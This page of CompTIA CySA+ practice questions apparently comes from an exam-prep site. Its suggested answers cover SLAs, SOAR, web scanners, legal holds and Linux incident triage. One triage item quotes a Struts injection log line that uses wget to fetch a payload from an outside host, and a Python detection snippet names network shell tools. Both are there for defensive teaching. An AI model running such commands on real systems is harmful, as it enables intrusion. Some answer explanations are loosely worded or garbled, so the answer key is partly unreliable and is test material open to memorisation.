ExamGecko
CompTIA CS0-003 Practice Test - Questions Answers, Page 33


An MSSP received several alerts from customer 1, which caused a missed incident response deadline for customer 2. Which of the following best describes the document that was violated?

A. KPI
B. SLO
C. SLA
D. MOU
Suggested answer: C

Explanation:

The document that was violated in this scenario is the SLA (Service Level Agreement). An SLA is a formal agreement between a service provider and a customer that defines the level of service expected. It includes specific metrics such as response times and resolution times. Missing an incident response deadline for customer 2 due to alerts from customer 1 indicates a breach of the agreed-upon service levels outlined in the SLA.

A SOC analyst determined that a significant number of the reported alarms could be closed after removing the duplicates. Which of the following could help the analyst reduce the number of alarms with the least effort?

A. SOAR
B. API
C. XDR
D. REST
Suggested answer: A

Explanation:

Security Orchestration, Automation, and Response (SOAR) can help the SOC analyst reduce the number of alarms by automating the process of removing duplicates and managing security alerts more efficiently. SOAR platforms enable security teams to define, prioritize, and standardize response procedures, which helps in reducing the workload and improving the overall efficiency of incident response by handling repetitive and low-level tasks automatically.

A development team is preparing to roll out a beta version of a web application and wants to quickly test for vulnerabilities, including SQL injection, path traversal, and cross-site scripting. Which of the following tools would the security team most likely recommend to perform this test?

A. Hashcat
B. OpenVAS
C. OWASP ZAP
D. Nmap
Suggested answer: C

Explanation:

OWASP ZAP (Zed Attack Proxy) is a tool recommended for quickly testing web applications for vulnerabilities, including SQL injection, path traversal, and cross-site scripting. It is an open-source web application security scanner that helps identify security issues in web applications during the development and testing phases.

An organization has a critical financial application hosted online that does not allow event logging to send to the corporate SIEM. Which of the following is the best option for the security analyst to configure to improve the efficiency of security operations?

A. Configure a new SIEM specific to the management of the hosted environment.
B. Subscribe to a threat feed related to the vendor's application.
C. Use a vendor-provided API to automate pulling the logs in real time.
D. Download and manually import the logs outside of business hours.
Suggested answer: C

Which of the following will most likely cause severe issues with authentication and logging?

A. Virtualization
B. Multifactor authentication
C. Federation
D. Time synchronization
Suggested answer: D

Explanation:

Time synchronization issues can cause severe problems with authentication and logging. If system clocks are not properly synchronized, it can lead to discrepancies in log timestamps, making it difficult to correlate events across different systems. Additionally, time-related discrepancies can affect authentication mechanisms that rely on time-based tokens, such as those used in multifactor authentication, leading to failures and security gaps.

A regulated organization experienced a security breach that exposed a list of customer names with corresponding PH data. Which of the following is the best reason for developing the organization's communication plans?

A. For the organization's public relations department to have a standard notification
B. To ensure incidents are immediately reported to a regulatory agency
C. To automate the notification to customers who were impacted by the breach
D. To have approval from executive leadership on when communication should occur
Suggested answer: B

Explanation:

Developing an organization's communication plans is crucial to ensure that incidents, especially those involving sensitive data like PH (Protected Health) data, are promptly reported to the relevant regulatory agencies. This is essential for compliance with legal and regulatory requirements, which often mandate timely notification of data breaches. Effective communication plans help the organization manage the breach response process, mitigate potential legal penalties, and maintain transparency with regulatory bodies.

Which of the following explains the importance of a timeline when providing an incident response report?

A. The timeline contains a real-time record of an incident and provides information that helps to simplify a postmortem analysis.
B. An incident timeline provides the necessary information to understand the actions taken to mitigate the threat or risk.
C. The timeline provides all the information, in the form of a timetable, of the whole incident response process including actions taken.
D. An incident timeline presents the list of commands executed by an attacker when the system was compromised, in the form of a timetable.
Suggested answer: C

Explanation:

An incident response timeline is a detailed chronological record of all events and actions taken during the response to a security incident. It includes timestamps and descriptions of each step, providing a comprehensive overview of how the incident was detected, contained, mitigated, and resolved. This timeline is crucial for post-incident analysis, helping to understand the effectiveness of the response, identify areas for improvement, and ensure accountability and transparency in the incident handling process.

An organization receives a legal hold request from an attorney. The request pertains to emails related to a disputed vendor contract. Which of the following is the first step for the security team to take to ensure compliance with the request?

A. Publicly disclose the request to other vendors.
B. Notify the departments involved to preserve potentially relevant information.
C. Establish a chain of custody, starting with the attorney's request.
D. Back up the mailboxes on the server and provide the attorney with a copy.
Suggested answer: B

Explanation:

The first step for the security team when receiving a legal hold request is to notify the relevant departments to preserve all potentially relevant information. This ensures that no data is altered, deleted, or otherwise tampered with, which is critical for maintaining the integrity of the evidence. Preserving information includes emails, documents, and any other data that might be relevant to the legal matter. Establishing a chain of custody and backing up data are also important steps, but notifying the involved parties is the immediate priority to prevent data loss.


An incident response team member is triaging a Linux server. The output is shown below:

$ cat /etc/passwd
root:x:0:0::/:/bin/zsh
bin:x:1:1::/:/usr/bin/nologin
daemon:x:2:2::/:/usr/bin/nologin
mail:x:8:12::/var/spool/mail:/usr/bin/nologin
http:x:33:33::/srv/http:/bin/bash
nobody:x:65534:65534:Nobody:/:/usr/bin/nologin
git:x:972:972:git daemon user:/:/usr/bin/git-shell

$ cat /var/log/httpd
at org.apache.catalina.core.ApplicationFilterChain.internaDoFilter(ApplicationFilterChain.java:241)
at org.apache.catalina.core.ApplicationFilterChain.internaDoFilter(ApplicationFilterChain.java:208)
at org.java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:316)
at org.java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
WARN [struts2.dispatcher.multipart.JakartaMultipartRequest] Unable to parse request container.getlnstance.(#wget http://grohl.ve.da/tmp/brkgtr.zip;#whoami)
at org.apache.commons.fileupload.FileUploadBase$FileUploadBase$FileItemIteratorImpl.<init>(FileUploadBase.java:947) at org.apache.commons.fileupload.FileUploadBase.getItemiterator(FileUploadBase.java:334)
at org.apache.struts2.dispatcher.multipart.JakartaMultipartRequest.parseRequest(JakartaMultiPartRequest.java:188) org.apache.struts2.dispatcher.multipart.JakartaMultipartRequest.parseRequest(JakartaMultipartRequest.java:423)

Which of the following is the adversary most likely trying to do?

A. Create a backdoor root account named zsh.
B. Execute commands through an unsecured service account.
C. Send a beacon to a command-and-control server.
D. Perform a denial-of-service attack on the web server.
Suggested answer: B

Explanation:

The log output indicates an attempt to execute commands through an unsecured service account. Two details in the triage output support this: the /etc/passwd listing shows the http service account (UID 33) configured with the interactive shell /bin/bash rather than /usr/bin/nologin like the other service accounts, and the Struts multipart warning records request content containing wget and whoami commands. This suggests that the adversary is exploiting a vulnerability in the web application to run unauthorized commands in the context of that account, which is a common technique for gaining a foothold or further compromising the system. The presence of wget http://grohl.ve.da/tmp/brkgtr.zip indicates an attempt to download and possibly execute a malicious payload.
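As an added illustration of the triage reasoning (this is not part of the exam item), the following Python performs the two checks the explanation relies on: it flags system accounts in /etc/passwd that have an interactive shell, and it flags Struts multipart parse warnings that echo shell commands from the request so they can be recorded in the incident timeline. The passwd and log text are constructed samples modelled on the output above; the UID threshold and the list of non-login shells are assumptions reflecting common distribution defaults.

```python
import re

# Constructed sample input modelled on the triage output above (not real data).
PASSWD = """root:x:0:0::/:/bin/zsh
bin:x:1:1::/:/usr/bin/nologin
daemon:x:2:2::/:/usr/bin/nologin
mail:x:8:12::/var/spool/mail:/usr/bin/nologin
http:x:33:33::/srv/http:/bin/bash
nobody:x:65534:65534:Nobody:/:/usr/bin/nologin
git:x:972:972:git daemon user:/:/usr/bin/git-shell
"""
HTTPD_LOG = """at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
WARN [struts2.dispatcher.multipart.JakartaMultipartRequest] Unable to parse request container.getInstance.(#wget http://grohl.ve.da/tmp/brkgtr.zip;#whoami)
at org.apache.commons.fileupload.FileUploadBase$FileItemIteratorImpl.<init>(FileUploadBase.java:947)
"""

# Shells that deny an interactive login (assumed list); anything else on a system account is a finding.
NOLOGIN_SHELLS = {"/usr/bin/nologin", "/sbin/nologin", "/bin/false", "/usr/bin/git-shell"}

def interactive_service_accounts(passwd_text, uid_threshold=1000):
    """Return (user, uid, shell) for non-root system accounts (UID below the
    threshold, a common distro default) whose login shell is interactive."""
    hits = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue  # skip blank or malformed lines
        user, uid, shell = fields[0], int(fields[2]), fields[6]
        if user != "root" and uid < uid_threshold and shell not in NOLOGIN_SHELLS:
            hits.append((user, uid, shell))
    return hits

# Struts multipart parse warnings echo the offending request; shell commands
# prefixed with '#' inside that echo are the signal worth alerting on.
MULTIPART_WARN = "JakartaMultipartRequest] Unable to parse request"
INJECT_RE = re.compile(r"#(wget|curl|whoami|sh|bash|nc|python)\b", re.IGNORECASE)

def suspicious_multipart_lines(log_text):
    """Return the flagged log lines with the echoed commands extracted,
    ready to be copied into the incident timeline."""
    findings = []
    for line in log_text.splitlines():
        if MULTIPART_WARN in line and INJECT_RE.search(line):
            cmds = [c.strip() for c in re.findall(r"#([^;)]+)", line)]
            findings.append({"line": line, "commands": cmds})
    return findings
```

Running interactive_service_accounts(PASSWD) returns only the http account, and suspicious_multipart_lines(HTTPD_LOG) returns the single WARN line with the wget and whoami commands extracted.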

A SOC analyst observes reconnaissance activity from an IP address. The activity follows a pattern of short bursts toward a low number of targets. An open-source review shows that the IP has a bad reputation. The perimeter firewall logs indicate the inbound traffic was allowed. The destination hosts are high-value assets with EDR agents installed. Which of the following is the best action for the SOC to take to protect against any further activity from the source IP?

A. Add the IP address to the EDR deny list.
B. Create a SIEM signature to trigger on any activity from the source IP subnet detected by the web proxy or firewalls for immediate notification.
C. Implement a prevention policy for the IP on the WAF.
D. Activate the scan signatures for the IP on the NGFWs.
Suggested answer: A

Explanation:

In this scenario, adding the IP address to the EDR (Endpoint Detection and Response) deny list is an immediate and effective way to block further reconnaissance activities from the malicious source. EDR solutions are designed to provide advanced endpoint security, including blocking specific IP addresses and preventing potentially harmful traffic. This proactive step aligns with CompTIA Cybersecurity Analyst (CySA+) best practices for threat prevention and response. While other options, such as using SIEM for monitoring (option B) or WAF policies (option C), provide additional layers of security, they do not directly block the threat in the same immediate way that adding the IP to the EDR deny list does.
